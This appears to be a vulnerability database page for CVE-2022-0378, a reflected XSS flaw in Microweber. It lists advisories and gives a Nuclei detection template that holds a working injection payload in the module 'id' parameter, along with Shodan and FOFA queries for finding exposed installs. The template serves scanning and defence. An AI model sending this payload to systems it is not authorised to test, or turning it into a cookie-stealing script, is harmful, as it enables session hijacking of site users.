| Title | Published | Views | Reporter |
|---|---|---|---|
| Cross-site Scripting (XSS) - Reflected in microweber/microweber | 2 Jan 2022 12:01 | – | huntr |
| CVE-2022-0378 | 26 Jan 2022 16:15 | – | attackerkb |
| The vulnerability of the Microweber content management system arises from the lack of measures taken to protect the website structure. This allows attackers to carry out XSS attacks. | 9 Nov 2023 00:00 | – | bdu_fstec |
| CVE-2022-0378 | 26 Jan 2022 18:19 | – | circl |
| Microweber cross-site scripting vulnerability | 26 Jan 2022 00:00 | – | cnnvd |
| CVE-2022-0378 | 26 Jan 2022 15:25 | – | cve |
| CVE-2022-0378 Cross-site Scripting (XSS) - Reflected in microweber/microweber | 26 Jan 2022 15:25 | – | cvelist |
| EUVD-2022-0433 | 3 Oct 2025 20:07 | – | euvd |
| Cross-site Scripting in microweber | 28 Jan 2022 22:15 | – | github |
| CVE-2022-0378 | 26 Jan 2022 16:15 | – | nvd |

```yaml
id: CVE-2022-0378

info:
  name: Microweber Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patch or upgrade to a version that has addressed the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0378
    - https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce
    - https://huntr.dev/bounties/529b65c0-5be7-49d4-9419-f905b8153d31
    - https://github.com/vohvelikissa/bugbouncing
    - https://github.com/x86trace/Oneliners
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-0378
    cwe-id: CWE-79
    epss-score: 0.03866
    epss-percentile: 0.88872
    cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microweber
    product: microweber
    shodan-query:
      - http.favicon.hash:780351152
      - http.html:"microweber"
    fofa-query:
      - body="microweber"
      - icon_hash=780351152
  tags: cve2022,cve,microweber,xss,huntr,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'mwui_init'
          - 'onmousemove="alert(document.domain)'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008b40a6221d90d1375774fe5e8fcd7b70015d6eaa3d7d64443e6456cee63c48d1022028af5e3681277e0fec8915231927ae22c34b0bd202824d75ad8cf65d83a75441:922c64590222798bb761d5b6d8e72950
```